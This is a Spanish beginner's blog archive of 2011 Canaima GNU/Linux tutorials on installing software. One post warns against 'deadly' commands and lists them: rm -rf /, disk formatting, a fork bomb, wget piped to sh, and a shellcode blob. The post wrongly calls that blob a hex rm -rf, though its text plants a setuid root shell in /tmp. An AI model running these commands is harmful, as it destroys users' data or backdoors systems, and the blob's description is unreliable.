lunes, 30 de mayo de 2011

Cómo se instalan las aplicaciones en CanaimaGNU/Linux

Una de las preguntas o dudas más comunes entre los usuarios de la distribución Canaima GNU/Linux es cómo se hace para instalar o desinstalar los programas.

Primero, debes saber varias cosas:

  1. No es necesario buscar por google o descargar el programa desde cualquier página en internet. Los programas en Canaima GNU/Linux se mantienen en un repositorio y se buscan, descargan, instalan, actualizan y eliminan desde la misma distribución, a través de un programa llamado SYNAPTIC, que se puede acceder desde el menú Sistema > Administración > Gestor de Paquetes Synaptic.
  2. Un repositorio es un servidor mantenido por la comunidad Canaima GNU/linux desde donde se pueden bajar todas las aplicaciones disponibles para el sistema. También puedes agregar otros repositorios, pero esto lo debes hacer bajo tu propia responsabilidad puesto que podrías dañar tu sistema al no ser compatibles.
  3. SYNAPTIC no es más que una colección de herramientas que sirven para automatizar el proceso de instalación, actualización, configuración y eliminación de paquetes de software.
  4. La aplicación Gestor de Paquetes Synaptic te permite instalar programas en tu equipo y gestionar los programas que están ya instalados.
  5. Synaptic es una interfaz gráfica GTK+ de APT, por eso es posible instalar también programas desde un terminal usando el comando apt-get install programa o aptitude install programa.
  6. Otros paquetes  pueden estar disponibles en internet para Canaima GNU/Linux en extensiones .deb pues es la extensión del formato de paquetes de software de Debian y derivadas, como Canaima GNU/Linux.
  7. Puedes instalar programas también compilando su código fuente, aunque este paso es para usuarios mucho más avanzados.
  8. No se pueden instalar programas con extensiones .exe directamente en Canaima GNU/linux.

USANDO SYNAPTIC


  1. Abre Synaptic, desde el menú Sistema > Administración > Gestor de Paquetes Synaptic
  2. En el campo "búsqueda" escribe el criterio de búsqueda, también puedes navegar por las categorías o hacer uso de la búsqueda avanzada.
  3. Una vez hayas encontrado el paquete a instalar, haz doble clic sobre él. Se te mostrarán los paquetes adicionales que de deben instalar para que el programa funcione. Acepta.
  4. Haz clic en el botón "aplicar". Puedes seleccionar varios programas a instalar y luego, aplicar todos los cambios. Vuelve a hacer clic en aplicar en la ventana resumen que se te mostrará.
  5. Siéntate a esperar a ver cómo el sistema hace todo por ti: descarga, instala y configura tus programas nuevos.

USANDO UN PAQUETE .DEB previamente descargado de internet. (modo gráfico)

  1. Descárgate el paquete .deb
  2. Haz clic sobre él con el botón izquierdo del ratón.
  3. Selecciona la opción "Abrir con instalador de paquetes GDebi"
  4. Se te mostrará una ventana con alguna información importante: los paquetes adicionales que se instalarán, o si el programa no se instalará debido a que las dependencias no se cumplen (a diferencia de instalar con synaptic o mediante cónsola o terminal, con este método, a veces, no se pueden satisfacer las dependencias automáticamente)


DESDE EL TERMINAL O CÓNSOLA, puedes instalar paquetes de varias maneras:


  • Con el comando APT (o aptitude) (debes conocer el nombre del paquete a instalar)
  1. Abre un terminal desde el menú Aplicaciones > Accesorios > Terminal de root.
  2. Escribe el siguiente comando apt-get install nombre_del_paquete o aptitude install _nombre_del_paquete y presiona la tecla retroceso (enter)
  3. como en Synaptic, pero en modo texto, se te mostrarán la lista de dependencias que el programa requiere. Escribe la letra "s" para aceptar los cambios, y aprieta entrer.
  4. Siéntate a esperar a ver cómo el sistema hace todo lo demás por ti: descarga, instala y actualiza tus nuevos programas.
  5. Puedes, igualmente, instalar varios programas al mismo tiempo si escribes sus nombres dejando un espacio entre cada uno, ejemplo: apt-get install programa1 programa2 programa3
  • Un paquete .deb previamente descargado (debemos controlar las dependencias requeridas)
  1. Abre un terminal desde el menú Aplicaciones > Accesorios > Terminal de root.
  2. Dirígete a la carpeta donde tienes el paquete descargado, escribiendo el comando cd carpeta
  3. Escribe el siguiente comando dpkg -i paquete.deb

  • Un paquete RPM previamente descargado (debemos tener instalado el paquete ALIEN, ya que los archivos con extensión .rpm son ejecutables de otras distribuciones no basadas en Debian, y ALIEN permite la conversión de la extensión .rpm a .deb)
  1. Abre un terminal desde el menú Aplicaciones > Accesorios > Terminal de root.
  2. Dirígete a la carpeta donde tienes el paquete descargado, escribiendo el comando cd carpeta
  3. Escribe el siguiente comando alien -i paquete.rpm
Nota: Si te dice algo sobre permiso denegado escribe: chmod +x nombredelarchivo.extensión (le darás permiso de ejecución al archivo) , y vuelve a ejecutar el comando.


COMPILANDO EL CÓDIGO FUENTE (pasos para usuarios avanzados)

  1. Descárgate el código fuente
  2. Entra a la carpeta descargada usando una cónsola o terminal de root: Escribe el comando cd carpeta.
  3. Una vez dentro del paquete, ejecuta los siguientes comandos:
  • ./configure
  • make
  • make install

ARCHIVOS CON EXTENSIÓN BIN previamente descargado (los ejecutables de Linux)

Los archivos bin son ejecutables, o sea, ya están compilados. Son algo así como los .exe del sistema operativo propietario Windows. No se "instalan" como tal, solo tienes que darles permisos de ejecución:

En modo gráfico, haz click derecho sobre el ícono del archivo > propiedades > permisos y le marcas "permitir ejecutar el archivo como un programa."


Una vez hecho eso, con un doble click sobre el ícono debería ejecutarse.

¿Te sirvió este tutorial?. Por favor, deja constancia de ello.

Tus comentarios, correcciones, aportaciones, agradecimientos, etc; son bienvenidos.

jueves, 26 de mayo de 2011

Docky, un bonito lanzador de aplicaciones

Un dock no es más que un lanzador de aplicaciones. Docky es un tema de Gnome Do, el lanzador de aplicaciones de Gnome, el escritorio por defecto de Canaima, la distribución venezolana deribada de Debian, una... ok, me detengo.


Para instalarlo en nuestra distribución preferida, Canaima, vamos a hacerlo por el lado fácil: por terminal.

1. Abrimos un terminal de root: menú Aplicaciones > Accesorios > Terminal de root

2. Escribimos el comando apt-get install docky, le damos enter, y como verás, te vuelven a preguntar si deseas continuar, escribes la letra "s" y vuélvele a dar enter... No te resta más que esperar a descargar y que se instale ¡solito!


3. Una vez instalado, lo encontrarás en el menú Aplicaciones > Accesorios > Docky


4. Ahora, sólo te resta probarlo. Tienes algunas configuraciones que puedes cambiar, accediendo a ellas haciendo click en el botón verde en la parte izquierda del dock.



Nota: si quieres añadir al dock lanzadores para cualquier aplicación, sólo tienes que arrastrarlo al dock. ¡Así de fácil!
Nota 2: Para que Docky funcione correctamente, debes tener habilitado compiz.

¿Te sirvió este tutorial?. Por favor, deja constancia de ello. Tus comentarios, correcciones, aportaciones, agradecimientos, etc; son bienvenidos.

miércoles, 25 de mayo de 2011

Aplicaciones portables para Linux

El proyecto portablelinuxapps nos trae el maravilloso mundo de las aplicaciones portables a GNU/Linux. Esto implica que ya podemos disponer en nuestras memorias USB de nuestros programas favoritos para ejecutarlos en cualquier equipo con Linux o simplemente probarlos.

Más interesante aún es el hecho de poder utilizar el mismo ejecutable en distintas distribuciones como por ejemplo, Ubuntu, Fedora o Canaima. Y, además, podemos despedirnos de las dependencias o de descomprimir el archivo. La mecánica en PORTABLELINUXAPPS.org es tan simple como descargar el programa, hacerlo ejecutable y ejecutarlo. A día de hoy ya cuentan con 53 aplicaciones tan variadas como Opera 10.60, TeamViewer 5 o Audacity, por nombrar algunas, pero su número crece rápidamente.

¿Te apetece verlo con un ejemplo? Comenzamos…

1. El primer paso consiste en visitar PORTABLELINUXAPPS.org y hacer clic sobre el icono del programa que queramos utilizar.



2. A continuación, nos aparecerá el diálogo para elegir qué hacer con el archivo. Seleccionamos Guardar archivo y pulsamos Aceptar.


3. El siguiente paso consiste en hacer el programa ejecutable. Por eso hacemos clic con el botón derecho sobre el archivo descargado y, en el menú contextual, pulsamos Propiedades.

4. En la pestaña Permisos activamos la casilla "Permitir ejecutar el archivo como un programa".

5. Por último, sólo nos queda hacer doble clic sobre el archivo para ejecutarlo.


¿Te sirvió este tutorial?. Por favor, deja constancia de ello. Tus comentarios, correcciones, aportaciones, agradecimientos, etc; son bienvenidos.

Volver/Salir modo gráfico

Este tema tendrá más palabras de las que requiere, sólo para hacerlo un poquito más largo, porque la verdad es que bastante sencillo lo que hay que hacer.

Si por alguna razón en algún momento tu máquina con Canaima GNU/Linux entra en modo texto (sólo aparece una pantalla negra con unas letras en blanco que dicen algo como "login:"), pues, sólo debes presionar las teclas ATL+F7 para que inicie el sistema gráfico.

El mismo paso lo puedes hacer, para volver al modo texto; pero esto ya seguramente lo sabías si de hecho necesitas o quieres usar el modo texto.

¿Te sirvió este tutorial?. Por favor, deja constancia de ello. Tus comentarios, correcciones, aportaciones, agradecimientos, etc; son bienvenidos.

martes, 24 de mayo de 2011

7 comandos mortales en Linux

Es muy difícil que algún miembro de la comunidad de usuarios de sistemas GNU/Linux quiera hacerle algún daño a otro. O pueda que por nuestra propia ignorancia, acabemos escribiendo en cónsola con permisos de administrador "cualquier cosa" que vemos por ahí.

Si te estás iniciando en el mundo de Gnu/Linux, no está de más que tomes nota sobre estos comandos que son mortales para Linux. Amigo/a, antes de ejecutar un script o comando asegúrese de estar en lo correcto.

Algunos de estos comandos mortales son:

1. rm -rf /

Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendría a ser el equivalente (más o menos) a un FORMAT C: en Windows.


2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.

3. mkfs.ext3 /dev/sda

Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).

4. :(){:|:&};:

Conocido también como forkbomb, este comando comenzará a crear y ejecutar un elevado número de procesos en el sistema hasta que éste se bloquee.

5. cualquier_comando > /dev/sda

Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la pérdida total de datos.

6. wget http://alguna_url -O- | sh

Este comando descargará un fichero ejecutable o script y lo ejecutará. Si el sitio no es confiable podría ser contenido malicioso.

7. mv /home/tu_usuario/* /dev/null

Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).


¿Te sirvió este tutorial?. Por favor, deja constancia de ello. Tus comentarios, correcciones, aportaciones, agradecimientos, etc; son bienvenidos.

lunes, 23 de mayo de 2011

Ejecutar aplicaciones JAVA con icedtea

Bueno, ya antes les había comentado cómo forzar la instalación de sun-java6-plugin en Canaima3.0. Esto era lo que permitía que las aplicaciones java como las del chat de cantv.net (entre otras cosas) se ejecuten...

Pero eso, para algunos defensores del software libre, va contra la filosofía, debido a que sun-java es privativo y cerrado.

Entonces, tenemos otras opciones que, según se apunta, son software 100% libre. Y en el caso de java, tenemos Icedtea

Wikipedia nos dice que "IcedTea es un proyecto de desarrollo e integración de software creado por Red Hat en junio de 2007. El objetivo es hacer que el software OpenJDK publicado por Sun Microsystems como software libre en 2007 sea usable sin que sea necesario ningún otro software que no sea software libre."

Para instalarlo vamos a usar el Gestor de Paquetes Synaptic:

1. Accedemos a la ruta Sistema > Administración > Gestor de Paquetes Synaptic.

2. Buscamos Icedtea y seleccionamos los paquetes siguientes:

3. Aplicamos los cambios y esperamos a que se descarguen e instalen... ¡Listo!

NOTA: Les aviso que yo he probado esto sólo con el chat de cantv.net y me abría sin problemas. Incluso, iba más rápido que cuando forcé el sun-java6-plugin


¿Te sirvió este tutorial?. Por favor, deja constancia de ello. Tus comentarios, correcciones, aportaciones, agradecimientos, etc; son bienvenidos.

sábado, 21 de mayo de 2011

Únete a la campaña "Somos más del 1%"

La Campaña "Somos más del 1%" es una iniciativa de la página web dudalibre.com que busca desmentir las estadísticas de ciertas organizaciones y prensa que aseguran que el uso de GNU/Linux no supera el 1% y que no ha avanzado apenas en estos últimos años a nivel de escritorio.

Para participar deberás completar unos datos para hacer las estadísticas más fiables.


Entra ahora y participa. ¡Demostremos que somos más del 1%!

viernes, 20 de mayo de 2011

Comandos básicos en sistemas GNU/Linux

¿Eres de los usuarios que cuando hacen algo en terminal sólo copian y pegan los comandos pero no tiene ni idea de qué es lo que están haciendo?

Con la intención de familiarizarte más con los comandos básicos usados en sistemas operativos GNU/Linux como Canaima3.0, y gracias al portal web www.muylinux.com, te presento una imagen con una descripción de estos comandos.

click en la imagen para ampliarla

Espero que te sea últil.

jueves, 19 de mayo de 2011

Renombramiento masivo de archivos en Canaima 3.0

¿Necesitas renombrar muchos archivos y no has encontrado alguna manera fácil de hacerlo?

Supón que acabas de guardar las fotos del último viaje que hiciste y que tomaste con tu cámara digital; estas fotos tienen, usualmente, nombres extraños. Y más bien, te gustaría renombrarlas con viaje1.jpg viaje2.jpg, etc.

Este procedimiento es fácil de realizar en Canaima 3.0 GNU/Linux con el paquete pyrenamer.

Vamos a instalarlo usando el terminal (también puedes hacerlo desde Synaptic)

1. Abrimos un terminal de root (Menú Aplicaciones > Accesorios > Terminal de root)

2. Una vez abierta la terminal, escribimos apt-get install pyrenamer y hacemos enter.

3. Se nos especificarán los paquetes extras que necesitamos instalar para que la aplicación funcione, y se nos pide confirmar la instalación. Escribe una "s" para aceptar y vuelve a hacer enter...

4. Ahora, sólo resta esperar a que los paquetes se descarguen y se instalen ellos solitos.

5. Ya instalado, podrás acceder a él desde el menú Aplicaciones > Accesorios > Pyrenamer.


6. Sólo te resta utilizarlo. Es muy intuitivo.

martes, 17 de mayo de 2011

Instalar VirtualBox en Canaima 3.0

Oracle VM VirtualBox es un software de virtualización para arquitecturas x86, creado originalmente por la empresa alemana innotek GmbH. Actualmente es desarrollado por Oracle Corporation como parte de su familia de productos de virtualización. Por medio de esta aplicación es posible instalar sistemas operativos adicionales, conocidos como "sistemas invitados", dentro de otro sistema operativo "anfitrión", cada uno con su propio ambiente virtual...

Para instalarlo en Canaima 3.0, haremos lo siguiente:

1. Añadir el repositorio a sources.list. Para ello:

1.1 Abre un terminal de root (Aplicaciones > Accesorios > Terminal de root)
1.2 escribe este comando gedit /etc/apt/sources.list para editar este archivo.
1.3 agrega esta línea y guarda de nuevo el archivo.

deb http://download.virtualbox.org/virtualbox/debian squeeze contrib non-free

1.4 Recuerda, es recomendable que añadas un comentario antes de añadir el repositorio, para que en un momento dado sepas de qué se trata, con el símbolo #


2. ahora, debemos añadir la clave pública, con este comando:

wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

3. Ahora, actualizamos los repositorios con apt-get update
4. Y por último, instalamos con
apt-get install virtualbox-4.0

Extrar archivos .rar y .zip en Canaima 3.0

Extraer archivos .rar y .zip en Canaima 3.0 no es posible por defecto, hay que hacer la instalación de los paquetes para tal fin. Y más sencillo no puede ser:

1. Abre un terminal de root siguiendo la ruta Menú Aplicaciones > Accesorios > Terminal de root.

2. Escribe lo siguiente: apt-get install rar unrar y haz enter... Sí, eso es todo.

lunes, 16 de mayo de 2011

Activar efectos de escritorio en Canaima 3.0


Compiz utilizando el plugin "Cubo del Escritorio"

Compiz es uno de los primeros gestores de ventana de composición para el sistema de ventanas X Window que es capaz de aprovechar la aceleración OpenGL. En pocas palabras, permite acceder a esta característica para ofrecerte espectaculares efectos de escritorios totalmente personalizables.

Para activarlo:

1. Vamos a Synaptic (Menú Sistema > Administración > Gestor de Paquetes Synaptic) y escribimos en el campo de búsqueda "compiz". Seleccionamos el paquete "compiz" y el paquete "compizconfig-settings-manager" (el resto se activan solos al seleccionar estos dos) y luego hacemos click en el botón "Aplicar"


2. En la ventana de resumen volvemos a hacer click en aplicar.


3. Esperamos a que se descarguen e instalen todos los paquetes...


4. Una vez hecho eso, debemos hacer que compiz se instale al iniciar el sistema... para ello, nos vamos al menú Sistema > Preferencias > Aplicaciones al Inicio.


5. Ahora, escribimos compiz en el campo "nombre" y "comando"; en el campo comentarios, puedes escribir lo que quieras, o dejarlo en blanco.


6. Ya tienes los efectos activados. Sólo te resta reiniciar el sistema para que se activen, o abrir una cónsola (Menú Sistema > Accesorios > terminal) y escribir compiz y hacer enter.

7. En el menú Sistema > Preferencias > Administración de Opciones Compizconfig puedes administrar los efectos. Inténtalo.



Instalando Skype en Canaima3.0

Para instalar Skype en Canaima 3.0 añadiremos una nueva línea de repositorios al sources.list

1. Para ello vas a necesitar abrir dicho archivo usando el terminal de root. Sigue esta ruta: menú Aplicaciones > Accesorios >Terminal de root


2. Ahora, escribimos lo siguiente en el terminal:

gedit etc/apt/sources.list

3. Lo que hicimos anteriormente es abrir el sources.list con el editor de textos gedit. Bueno, ahora verás una ventana con algunas entradas. A esas entradas le añadirás la siguiente:

deb http://download.skype.com/linux/repos/debian/ stable non-free

4. Es bueno que antes de la entrada agregues un comentario con el símbolo # para que cuando revises el sources.list sepas de qué se trata la línea. Algo como # Repositorio de Skype.


5. Bueno, ahora sólo te resta guardar los cambios y cerrar esa ventana. Seguimos en la terminal...

6. Escribe apt-get update haz enter y espera a que termine el proceso de actualización de los repositorios.

7. Una vez se haya terminado todo, escribes apt-get install skype y haces enter. Esperas a que se descargue e instale y ¡listo!

No olvides comentar cualquier error/problema que hayas tenido con ese tutorial, o si encuentras un error en los pasos o alguna forma mejor de hacerlo. Tus comentarios son bienvenidos

Forzar instalación de Java plugin en Canaima 3.0

Por errores de dependencia, no es posible la instalación del paquete sun-java6-plugin indispensable para que el entorno java se ejecute en Canaima 3.0 y funcionen aplicaciones web, como el chat de cantv.net.

Dicho paquete dice que se requiere instalar iceweasel, pero no lo encuentra; claro, porque en realidad Canaima usa es Cunaguaro. Pero no todo está perdido. Aún puedes instalar el plugin:

  1. Descárgatelo desde aquí.
  2. Abre un terminal de Root, recuerda: Menú Aplicaciones > Accesorios > Terminal de Root
  3. Muévete desde ese terminal a la carpeta donde descargaste el paquete, escribiendo cd Descargas. (o el directorio donde descargas tus archivos)
  4. Ahora escribe el siguiente comando dpkg --install --force-all sun-java6-plugin_6.24-1~squeeze1_i386.deb
  5. Listo, ya deberías tener activado el plugin.
NOTA: El resto de paquetes de java pueden ser instalados desde synaptic (Menú Sistema > Administración > Gestor de Paquetes Synaptic)

  1. Busca sun-java6 y en los resultados marca sun-java6-bin y sun-java6-jre. Aplica los cambios y espera a que se descargue e instalen.
PD: Una vez instalado el sistema te dirá que tienes paquetes rotos. Sólo ignora estos mensajes hasta tanto haya otra forma de instalar este plugin.

NOTA:

Si deseas poder ejecutar aplicaciones java sin necesidad de depender del software cerrado y privativo, te recomiendo deshacerte de Java e instalar Icedtea.

domingo, 15 de mayo de 2011

Muestra las carátulas de tus álbunes de música en sus carpetas

Cover Thumbnailer es un script en Python que muestra las carátulas de tus CDs de música como íconos de tus carpetas de música. También ofrece una vista previa muy atractiva en las carpetas de Imágenes. Perfecto para buscar rápidamente nuestras fotos o seleccionar nuestra música preferida.

El script asigna los íconos en Nautilus automáticamente como cualquier otra miniatura de GNOME, no necesitas ejecutar ningún script para crear las miniaturas.

Cover Thumbnailer es software libre bajo licencia GPLv3 o superior y está disponible en más de 15 idiomas.

Miniaturas para carpetas de Música:



Para carpetas de Imágenes:



1. Para instalarlo, bájate este paquete.

2. Una descargado, haz click izquierdo sobre él y selecciona la opción "Abrir con instalador de paquetes GDebi".

3. Lo demás es carpintería. Haz click en "Instalar paquete" en la ventana que se te abrirá y espera que termine el proceso, que es muy rápido.

4. Para que funcione, deberás reiniciar Nautilus, para ello:

4.1 Abre un terminal desde el menú Aplicaciones > Accesorios > Terminal
4.2 Escribe lo siguiente: nautilus -q y haz enter. ¡Listo!

jueves, 12 de mayo de 2011

Instalar algunas aplicaciones de Windows en Canaima GNU/Linux

Wine es, de acuerdo a wikipedia, una reimplementación de la API de Win16 y Win32 para sistemas operativos basados en Unix que permite la ejecución de programas diseñados para MS-DOS, y las versiones de Windows 3.11, 95, 98, ME, NT, 2000, XP, Vista y 7.

Para instalarlo haremos uso del Gestor de Paquetes Synaptic, que lo encontraremos en la siguiente ruta: menú Sistema > Administración > Gestor de Paquetes Synaptic.

Una vez abierta, en el campo de búsqueda escribimos "wine" y navegamos un poco por las opciones que aparecen hasta que aparezca específicamente ese paquete. Lo seleccionamos y aplicamos los cambios.

Inmediatamente te aparecerá otra ventana resumen donde te aparecen los otros paquetes que se deben instalar para que wine funcione, haz click en aplicar.

Espera a que se descargue e instale la aplicación. Ahora, ya podrás instalar algunas de las aplicaciones de Windows en Canaima GNU/Linux, como Ares.

viernes, 6 de mayo de 2011

Instalar un messenger en Canaima 3.0

¿Tienes correo en hotmail y te gustaría o te gusta estar en contacto con ellos a través de la mensajería instantánea?

Te invito a que instales emesene, un clón de Windows Live Messenger que te permite conectarte a la red de MSN messenger y chatear con tus contactos de Windows Live.

1. Para instalarlo, haremos uso del Gestor de Paquetes Synaptic. Ábrelo siguiendo esta ruta: menú Sistema > Administración > Gestor de Paquetes Synaptic.

2. En el campo de búsqueda escribe emesene y haz enter.


3. Una vez realizada la búsqueda, seleciona el paquete a instalar en la otra ventana y luego haz click en "aplicar"



4. Una vez más haz click en "aplicar" en la ventana resumen.


5. Aguarda hasta que se descargue e instale emesene.


6. Una vez que todo el proceso haya terminado, podrás acceder a tu nuevo cliente de mensajería instantánea para la red MSN desde el menú Aplicaciones > Internet > Emesene

Visualiza tu uso de red desde el panel en Canaima 3.0 GNU/Linux

¿Deseas saber cuál es la velocidad de conexión que tienes en un determinado momento? Es muy sencillo descargar e instalar una aplicación que te dará esa información. Esa aplicación se llama NetSpeed y es un applet que se coloca en el panel.


1. Para instalarlo, haremos uso del Gestor de Paquetes Synaptic. Recuerda, para ubicarlo nos dirigimos al menú Sistema > Administración > Gestor de Paquetes Synaptic.

2. Una vez abierta la aplicación, en el campo de búsqueda escribimos netspeed. Selecciona la opción cuando te aparezca y luego haz click en aplicar.



3. En el resumen, vuelve a hacer click en aplicar y espera a que se descargue e instale la aplicación.




4. Una vez descargado e instalado, podrás agregarlo desde el panel haciendo clicl sobre él con el botón izquierdo y seleccionando la opción "agregar al panel"



5. En la nueva ventana que se te abrirá, navega por ella hasta llegar a la opción "monitor de la red". Selecciónalo y haz click en añadir. ¡Y listo!


Instalando Flash en Canaima GNU/Linux

Una necesidad en las distribuciones GNU/linux es instalar el plugin de adobe para ver videos flash (como los de youtube). Hacerlo en Canaima 3.0 resultó muy fácil haciendo uso del Gestor de Paquetes Synaptic.

1. Abrimos el Gestor de Paquetes Synaptic desde el menú sistema > administración > gestor de paquetes synaptic

2. Una vez abierta la aplicación, usamos la opción buscar para hacer la búsqueda y escribimos flashplugin. Deben aparecer dos opciones, selecciónalas.


3. Aplica los cambios, haciendo click en aplicar. Luego, vuelve a hacer click en aplicar en la siguiente ventana.


4. Espera un momento a que se descargue e instale el plugin. Te recomiendo que tengas el navegador cerrado mientras eso sucede...


5. Cuando el proceso termine, ya deberás poder disfrutar de los videos flash.

Instalar Firefox en Canaima GNU/Linux

Es muy sencillo realizar la instalación del Navegador web por excelencia, en su última versión:

1. Primero, debes saber que hay que usar la cónsola o terminal. La encontrarás en el menú aplicaciones>accesorios>terminal de root.

2. Una vez abierta, debemos descargar Firefox en el idioma que desees:

2.1. Abre la página de firefox.

2.2. Haz click en el enlace de descarga y elije la opción de guardarlo. Guárdalo en un directorio cualquiera, generalmente en Descargas.

3. Ahora, debemos descomprimir el archivo:

3.1. Dirígete a la carpeta donde descargaste el archivo.

3.2 Allá debe estar la carpeta descargada. Haz click derecho sobre ella y elije la opción "extraer aquí".

4. Una vez extraída, vamos a la terminal. Todo lo siguiente se va a hacer allí, en la terminal.

5. Debemos dirigirnos desde la terminal al directorio donde acabas de guardar y extraer el archivo de firefox. Para eso, escribe en la terminal cd (que significa "change directory" o "cambiar directorio") deja un espacio y luego el directorio donde descargaste el archivo; por ejemplo:

cd Descargas

6. Una vez dentro de la carpeta, escribe mv firefox/ /opt. Esto moverá la carpeta firefox al directorio opt.

7. Vamos a la carpeta /usr/bin para crear un enlace simbólico escribiendo lo siguiente: cd /usr/bin/

8. Creamos el enlace simbólico escribiendo: ln -s /opt/firefox/firefox

9. Ahora, sólo resta crear el lanzador de la aplicación. Puedes cerrar las ventanas que llevas abiertas.

10. Desde el escritorio, haz click derecho sobre él y elige la opción "crear un lanzador"


11. En la ventana que se abrirá colocamos los datos del programa. En comando le damos a examinar y buscamos el enlace simbólico de nombre firefox que esta en /usr/bin/ o sino en /opt/firefox/ (el que te funcione). En nombre puedes colocar Firefox o lo que desees. Y en comentario, lo que tú quieras, o puedes poner lo que generalmente dice firefox: "navegue por la web"


¡Y listo!